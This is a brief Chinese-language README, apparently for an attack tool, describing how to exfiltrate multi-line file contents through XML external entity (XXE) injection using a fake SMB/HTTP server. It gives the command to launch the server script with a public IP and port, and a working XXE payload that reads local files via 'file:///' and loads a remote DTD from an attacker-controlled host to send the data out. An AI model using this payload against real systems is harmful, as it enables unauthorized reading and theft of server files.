在xxe中使用smb外带多行内容
运行脚本
python3 xxe-smb-server.py public-ip-address web-port
fake server收到请求
payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///">
<!ENTITY % dtd SYSTEM "http://ip:port/data.dtd"> %dtd;
]>
<data>&send;</data>
file:///可改为其他路径测试
